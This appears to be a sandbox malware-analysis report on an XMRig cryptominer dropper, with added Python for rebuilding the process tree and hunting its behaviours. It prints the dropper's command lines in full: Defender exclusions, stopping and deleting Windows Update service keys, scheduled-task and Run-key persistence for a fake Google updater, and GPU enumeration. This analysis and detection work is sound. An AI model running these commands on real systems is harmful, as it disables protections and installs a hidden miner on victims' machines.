Analysis
- max time kernel: 149s
- max time network: 152s
- platform: windows10-1703_x64
- resource: win10-20220812-en
- resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 30-09-2022 16:06
- Static task: static1
General
- Target: 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe
- Size: 4.0MB
- MD5: 41382215636e83ce55d622ce7f15733a
- SHA1: aff94de054bb404000c010c4713998ddc6905626
- SHA256: 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d
- SHA512: 94216303bf4455bc2a8de631c453bef013c1fab36f28c167c3488730d430713f0f117561bff3137697732b3bf16cab74b772fad79a36fc7c06e5be6fbaafe98d
- SSDEEP: 98304:jgFNGMRUCTguDUdjIF1qZHEfgg1AE1AQamhsDUoYX4:jYN7bThDUdj+qxEYGAE1AQuR
Malware Config
Signatures
-
Modifies security service (2 TTPs, 5 IoCs)
Processes: reg.exe
description  ioc  process
- Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0  reg.exe
- Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1  reg.exe
- Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo  reg.exe
- Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters  reg.exe
- Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security  reg.exe
The command line targets HKLM\SYSTEM\CurrentControlSet\Services\wuauserv; CurrentControlSet is a symbolic link to the active control set, which is why the deletions are recorded under ControlSet001. The same cmd.exe chain deletes the UsoSvc, WaaSMedicSvc, bits and dosvc service keys as well; only the wuauserv deletion is attributed to this signature.
XMRig Miner payload (2 IoCs)
resource  yara_rule
- behavioral1/memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp  xmrig
- behavioral1/memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp  xmrig
PID 1892 is the dwm.exe instance whose thread context updater.exe rewrote (see "Suspicious use of SetThreadContext"); the 8.0MB region is the in-memory miner image.
Executes dropped EXE (1 IoC)
pid  process
- 3388  updater.exe
Stops running service(s) (3 TTPs)

resource  yara_rule
- behavioral1/memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp  upx
- behavioral1/memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp  upx
(UPX yara rule hits, listed under this heading in the report; they fire on the same two dwm.exe dumps as the xmrig rule.)
Suspicious use of SetThreadContext (2 IoCs)
Processes: updater.exe
description  pid process  ->  target pid process
- set thread context  3388 updater.exe  ->  4432 conhost.exe
- set thread context  3388 updater.exe  ->  1892 dwm.exe
Launches sc.exe (10 IoCs)
sc.exe is the Windows utility for controlling services on the system.
Processes: sc.exe (x10)
pid: 4308, 3496, 808, 4324, 1520, 4804, 852, 1340, 1084, 5004
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.exe (x5), dwm.exe
pid  process
- 2424  powershell.exe (3 entries)
- 3644  powershell.exe (3 entries)
- 3544  powershell.exe (3 entries)
- 356  powershell.exe (3 entries)
- 4688  powershell.exe (3 entries)
- 1892  dwm.exe (all remaining entries)
Suspicious behavior: LoadsDriver (1 IoC)
pid  process
- 624  (no image name recorded)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: powershell.exe (PIDs 2424, 3644)
Privilege sequence enabled by each process, in order:
Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- 2424  powershell.exe: the full sequence above (22 entries)
- 3644  powershell.exe: the full sequence above (22 entries), then a second pass from SeIncreaseQuotaPrivilege through 35 (20 entries; the list is capped at 64 IoCs)
The bare numbers are privilege LUIDs that the sandbox did not resolve to names.
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe, cmd.exe, powershell.exe, updater.exe, cmd.exe, conhost.exe, cmd.exe
parent (pid process) -> children (pid process); the report logs one row per write, so each child appears two or three times there and once here:
- 4876 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe -> 2424 powershell.exe, 3696 cmd.exe, 3644 powershell.exe, 3544 powershell.exe
- 3696 cmd.exe -> 4324 sc.exe, 1084 sc.exe, 1520 sc.exe, 4308 sc.exe, 5004 sc.exe, 4196 reg.exe, 1160 reg.exe, 4508 reg.exe, 1684 reg.exe, 1852 reg.exe
- 3544 powershell.exe -> 4128 schtasks.exe
- 3388 updater.exe -> 356 powershell.exe, 4652 cmd.exe, 4688 powershell.exe, 4432 conhost.exe, 4612 cmd.exe
- 4652 cmd.exe -> 3496 sc.exe, 4804 sc.exe, 852 sc.exe, 1340 sc.exe, 808 sc.exe, 192 reg.exe, 164 reg.exe, 3232 reg.exe, 3988 reg.exe, 4356 reg.exe
- 4432 conhost.exe -> 1192 cmd.exe
- 4612 cmd.exe -> 1008 WMIC.exe
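To work with the WriteProcessMemory and SetThreadContext tables outside the sandbox UI, here is an added Python example (mine, not part of the report or of the sandbox's own tooling) that parses the flattened "PID a wrote to memory of b a parent child" rows into a deduplicated parent/child tree and marks the processes whose thread context was rewritten. The input is an excerpt of the two tables from this report, cut down to one sc.exe/reg.exe child per cmd.exe; the function names are mine.

```python
"""Rebuild a process tree from the flattened 'Suspicious use of
WriteProcessMemory' / 'SetThreadContext' signature text of a sandbox report.
The sandbox logs one row per WriteProcessMemory call, so a single
CreateProcess shows up two or three times; the tree keeps each edge once.
"""
import re

# Constructed input: rows copied from the two signature tables above, cut
# down to one representative sc.exe / reg.exe child per cmd.exe.
DROPPER = "2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe"
WRITE_TEXT = " ".join([
    f"PID 4876 wrote to memory of 2424 4876 {DROPPER} powershell.exe",
    f"PID 4876 wrote to memory of 2424 4876 {DROPPER} powershell.exe",
    f"PID 4876 wrote to memory of 3696 4876 {DROPPER} cmd.exe",
    f"PID 4876 wrote to memory of 3644 4876 {DROPPER} powershell.exe",
    "PID 3696 wrote to memory of 4324 3696 cmd.exe sc.exe",
    "PID 3696 wrote to memory of 4196 3696 cmd.exe reg.exe",
    f"PID 4876 wrote to memory of 3544 4876 {DROPPER} powershell.exe",
    "PID 3544 wrote to memory of 4128 3544 powershell.exe schtasks.exe",
    "PID 3388 wrote to memory of 356 3388 updater.exe powershell.exe",
    "PID 3388 wrote to memory of 4652 3388 updater.exe cmd.exe",
    "PID 3388 wrote to memory of 4688 3388 updater.exe powershell.exe",
    "PID 4652 wrote to memory of 3496 4652 cmd.exe sc.exe",
    "PID 3388 wrote to memory of 4432 3388 updater.exe conhost.exe",
    "PID 3388 wrote to memory of 4432 3388 updater.exe conhost.exe",
    "PID 3388 wrote to memory of 4432 3388 updater.exe conhost.exe",
    "PID 3388 wrote to memory of 4612 3388 updater.exe cmd.exe",
    "PID 4432 wrote to memory of 1192 4432 conhost.exe cmd.exe",
    "PID 4612 wrote to memory of 1008 4612 cmd.exe WMIC.exe",
])
CONTEXT_TEXT = (
    "PID 3388 set thread context of 4432 3388 updater.exe conhost.exe "
    "PID 3388 set thread context of 1892 3388 updater.exe dwm.exe"
)

# One row: "PID <parent> <verb> <child> <parent> <parent image> <child image>".
# The repeated parent pid is matched with a backreference, so a row broken
# across a line wrap cannot pair the wrong pids; \s+ tolerates the wrap.
ROW = re.compile(
    r"PID\s+(?P<parent>\d+)\s+"
    r"(?P<verb>wrote\s+to\s+memory\s+of|set\s+thread\s+context\s+of)\s+"
    r"(?P<child>\d+)\s+(?P=parent)\s+(?P<pname>\S+)\s+(?P<cname>\S+)"
)


def parse_rows(text):
    """Yield (parent_pid, child_pid, parent_image, child_image, verb)."""
    for m in ROW.finditer(text):
        yield int(m["parent"]), int(m["child"]), m["pname"], m["cname"], m["verb"]


def build_tree(write_text, context_text=""):
    """Return (children, names, injected).
    children: parent pid -> child pids, deduplicated, first-seen order
    names:    pid -> image name
    injected: pids whose thread context a parent rewrote (injection targets)"""
    children, names, injected = {}, {}, set()
    for parent, child, pname, cname, verb in parse_rows(write_text + " " + context_text):
        names.setdefault(parent, pname)
        names.setdefault(child, cname)
        if verb.startswith("set"):
            injected.add(child)
        kids = children.setdefault(parent, [])
        if child not in kids:
            kids.append(child)
    return children, names, injected


def roots(children):
    """Pids that appear only as parents: the tree's top-level processes."""
    every_child = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in every_child]


def render(children, names, injected, pid=None, depth=0):
    """Indented lines; '*' marks a thread-context (injection) target."""
    lines = []
    for p in ([pid] if pid is not None else roots(children)):
        mark = " *" if p in injected else ""
        lines.append(f"{'  ' * depth}{p} {names[p]}{mark}")
        for c in children.get(p, []):
            lines.extend(render(children, names, injected, c, depth + 1))
    return lines


if __name__ == "__main__":
    print("\n".join(render(*build_tree(WRITE_TEXT, CONTEXT_TEXT))))
```

The rendered tree has two roots, 4876 (the submitted sample) and 3388 (updater.exe), which matches the Processes section below: the dropped binary is not a child of the sample but is started separately by the scheduled task. The two starred entries, conhost.exe and dwm.exe, are the processes that receive foreign code rather than a normal command line.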
Processes
The bracketed number is the depth in the original tree. PIDs are taken from the WriteProcessMemory and SetThreadContext signatures where the mapping is unambiguous. updater.exe appears as a second root because it was started by the Task Scheduler service after schtasks /run, not as a child of the dropper; it then repeats the dropper's own steps before injecting into conhost.exe and dwm.exe.

[1] C:\Users\Admin\AppData\Local\Temp\2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe  (PID 4876)
    cmd: "C:\Users\Admin\AppData\Local\Temp\2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2424)
      cmd: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SYSTEM32\cmd.exe  (PID 3696)
      cmd: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop dosvc
        - Launches sc.exe
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3644)
      cmd: powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3544)
      cmd: powershell <#zfalrzu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe  (PID 4128)
        cmd: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC

[1] C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe  (PID 3388)
    cmd: C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 356)
      cmd: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\system32\cmd.exe  (PID 4652)
      cmd: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe
        cmd: sc stop dosvc
        - Launches sc.exe
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4688)
      cmd: powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\system32\conhost.exe  (PID 4432; thread context set by updater.exe)
      cmd: C:\Windows\system32\conhost.exe llktminrzivp
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe  (PID 1192)
        cmd: cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
  [2] C:\Windows\system32\cmd.exe  (PID 4612)
      cmd: cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\Wbem\WMIC.exe  (PID 1008)
        cmd: wmic PATH Win32_VideoController GET Name, VideoProcessor
  [2] C:\Windows\system32\dwm.exe  (PID 1892; thread context set by updater.exe)
      cmd: C:\Windows\system32\dwm.exe qtbgcbbuyarrseoa
      - Suspicious behavior: EnumeratesProcesses
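The process tree above is a compact description of four hunt-worthy behaviours: a Defender exclusion over the whole user profile and Program Files, stop-and-delete of the Windows Update service family, logon persistence whose action lives under AppData\Roaming, and a WMI query for the GPU before the miner starts. As an added example (mine, not from the report and not from any vendor detection content), the Python below runs one rule per behaviour over constructed process-creation records of the Sysmon event 1 / Security 4688 shape. The first four records mirror command lines from the tree (PIDs as in the report, the persistence one-liner trimmed to its Register-ScheduledTask and reg add branches); the benign look-alikes and all rule names are my own. The rules generalise beyond this sample to any service in the update family, any task or Run-key action under a user-writable path and any Add-MpPreference -Exclusion* switch.

```python
"""Hunting rules for the behaviours in the process tree above, run over
process-creation records (Sysmon event 1 / Security 4688 style: pid, image,
command line). Written from this report's command lines but generalised to
any service, task name or drop path of the same shape.
"""
import re

# Windows Update service family the sample stops and deletes.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

# Directories a standard user can write to; a persistence action pointing here
# is the masquerade seen with ...\AppData\Roaming\Google\Chrome\updater.exe.
USER_WRITABLE = re.compile(
    r"\\(AppData|ProgramData|Temp|Users\\[^\\]+\\(Downloads|Desktop|Documents))\\", re.I)


def defender_exclusion(cmd):
    """Add-MpPreference with any -Exclusion* switch; an exclusion that covers a
    whole profile, Program Files or the system drive is the broad variant."""
    if not re.search(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)", cmd, re.I):
        return None
    broad = re.search(r"\$env:(UserProfile|ProgramFiles|SystemDrive)", cmd, re.I)
    return "defender_exclusion_broad" if broad else "defender_exclusion"


def update_service_tamper(cmd):
    """sc stop / reg delete aimed at the update services; deleting the service
    key is the more severe finding because the service is gone after reboot."""
    stopped = {s.lower() for s in re.findall(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", cmd, re.I)}
    deleted = {s.lower() for s in re.findall(
        r'reg(?:\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d+)\\Services\\([^"\\\s]+)',
        cmd, re.I)}
    if deleted & UPDATE_SERVICES:
        return "update_service_key_deleted"
    if stopped & UPDATE_SERVICES:
        return "update_service_stopped"
    return None


def persistence_from_user_path(cmd):
    """Scheduled-task or Run-key persistence; rated higher when the action
    lives in a user-writable directory."""
    created = re.search(
        r'Register-ScheduledTask|schtasks(?:\.exe)?\s+/create|reg(?:\.exe)?\s+add\s+"?HK(?:CU|LM)\\[^"]*\\Run\b',
        cmd, re.I)
    if not created:
        return None
    return "persistence_user_writable_path" if USER_WRITABLE.search(cmd) else "persistence_created"


def gpu_enumeration(cmd):
    """WMI query of the video controller: a miner choosing CPU vs GPU kernels."""
    if re.search(r"wmic(?:\.exe)?\s+PATH\s+Win32_VideoController", cmd, re.I):
        return "gpu_enumeration"
    return None


RULES = (defender_exclusion, update_service_tamper, persistence_from_user_path, gpu_enumeration)


def scan(events):
    """Map pid -> list of rule hits, omitting events with no hit."""
    hits = {}
    for ev in events:
        tags = [t for t in (rule(ev["cmdline"]) for rule in RULES) if t]
        if tags:
            hits[ev["pid"]] = tags
    return hits


def chain_verdict(hits):
    """Escalate when at least two of the three installer families (Defender
    exclusion, update-service tampering, persistence) appear together; the
    report shows all three, plus GPU enumeration, from one dropper."""
    families = {tag.split("_")[0] for tags in hits.values() for tag in tags}
    return len(families & {"defender", "update", "persistence"}) >= 2


# Constructed records: the first four mirror command lines from the report
# (PIDs as in the report, the PowerShell one-liner trimmed to its persistence
# branches); the last three are benign look-alikes that must not fire.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 2424, "image": PS,
     "cmdline": r"powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"},
    {"pid": 3696, "image": r"C:\Windows\SYSTEM32\cmd.exe",
     "cmdline": r'cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc'
                r' & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f'
                r' & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f'},
    {"pid": 3644, "image": PS,
     "cmdline": r"""powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }"""},
    {"pid": 1008, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmdline": "wmic PATH Win32_VideoController GET Name, VideoProcessor"},
    {"pid": 5100, "image": r"C:\Windows\system32\sc.exe", "cmdline": "sc query wuauserv"},
    {"pid": 5101, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Backup" /tr "C:\Program Files\Acme\backup.exe" /sc daily /st 02:00'},
    {"pid": 5102, "image": PS, "cmdline": "powershell Get-MpPreference"},
]

if __name__ == "__main__":
    found = scan(EVENTS)
    for pid, tags in found.items():
        print(pid, ", ".join(tags))
    print("escalate:", chain_verdict(found))
```

The benign scheduled task still registers as persistence_created, which is the intended behaviour: task creation is worth logging, but only the user-writable action path (or the combination with an exclusion or service tampering) should page anyone. Note also that the second, already-deleted run of the reg delete chain from updater.exe would fire the same rule, so the detector catches the persistence-stage replay, not just the first execution.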
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 65c8499b7e69d7dd364815dbae2b6989
  SHA1: 23df5d601dbd83f5a6f686f952448b0cc21d3b92
  SHA256: 599dd04a954cb0a826224cf627d38d0bea8ee3d0896d0733ee731e114197d73e
  SHA512: 1695633aafa095c510fb19895c6d28bf12ea597b873751e68a0a2364c34cce2322631945047e639fd1f165c60fd4e1f1fcf39acd4b714b7d25d50381f7e6ffdf
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 3fd2e7427285bcbc00dcc0dc49b40196
  SHA1: d6e56706c26665d2be693ab870898d340beb4bdd
  SHA256: 2d861694a1ec8b3863a81ba0df740390eb7d01835e4ca4eee367aba797891956
  SHA512: 78048f1543f538d0acc6777de939207ae30cea312e551bf86ccfd31779c92194a7774b0f342ff2d95e0876169755f008d08fdf76f2fb2e4ecab73564c1e7a3b0
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 99f3c4e76ac63484d214fb91349644e8
  SHA1: f065388679a20bd59e75166ba9174b8fe8c510bf
  SHA256: a01e65c4ee2ce09215f4e35db060152f1ab5f21ce84cfa954118cc724bfe4e9c
  SHA512: c9a0a4b5c13d381875485316ce56f56839dd76bc53fd574139830817252ad0e1ffcdf64f408d1942a3c95541181d07c15ecff9f20b5f0de3890490de0f530e67
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: b048bf8754fa7e5cec67d8cd464c8bf9
  SHA1: 511440b7c0eba55472dad88c574a367ce4907456
  SHA256: 5d1954206c50f6f1107b7622dbc812e2f7de31a4fe7ef6a0985505701bd9f9b3
  SHA512: 3fc4dc6bc9037508ee3f85a1c471114133a7984c78d75214add56f2dec47996abc2f9a1bd93f0b120760932e1a99d5450204e44490bc23f254e30a0641086c72
- C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe (listed twice in the report with identical hashes)
  Filesize: 4.0MB
  MD5: c5eccb1c34f5b5280b63739c2c0c09e8
  SHA1: e2005f576140f66759cb8a68c4aec4f94e61b94b
  SHA256: 9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c
  SHA512: 71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd
  The dropped copy is the same size as the submitted sample but has a different hash, so a hunt keyed only on the submitted sample's hashes will miss it; key on the path, the task name GoogleUpdateTaskMachineQC and the Run value as well.
- C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
  Filesize: 226B
  MD5: fdba80d4081c28c65e32fff246dc46cb
  SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
  SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
  SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Memory dumps (pid-sequence-address; the mapping dump for 1892 at 0x00007FF7A8A325D0 falls inside the 8.0MB region that the xmrig and upx rules matched)
- memory/164-288-0x0000000000000000-mapping.dmp
- memory/192-285-0x0000000000000000-mapping.dmp
- memory/356-226-0x0000000000000000-mapping.dmp
- memory/808-276-0x0000000000000000-mapping.dmp
- memory/852-273-0x0000000000000000-mapping.dmp
- memory/1008-315-0x0000000000000000-mapping.dmp
- memory/1084-166-0x0000000000000000-mapping.dmp
- memory/1160-179-0x0000000000000000-mapping.dmp
- memory/1192-314-0x0000000000000000-mapping.dmp
- memory/1340-274-0x0000000000000000-mapping.dmp
- memory/1520-169-0x0000000000000000-mapping.dmp
- memory/1684-185-0x0000000000000000-mapping.dmp
- memory/1852-188-0x0000000000000000-mapping.dmp
- memory/1892-328-0x0000016C44700000-0x0000016C44720000-memory.dmp  (Filesize 128KB)
- memory/1892-323-0x0000016BB19E0000-0x0000016BB1A00000-memory.dmp  (Filesize 128KB)
- memory/1892-319-0x0000016BB0010000-0x0000016BB0030000-memory.dmp  (Filesize 128KB)
- memory/1892-318-0x00007FF7A8A325D0-mapping.dmp
- memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp  (Filesize 8.0MB)
- memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp  (Filesize 8.0MB)
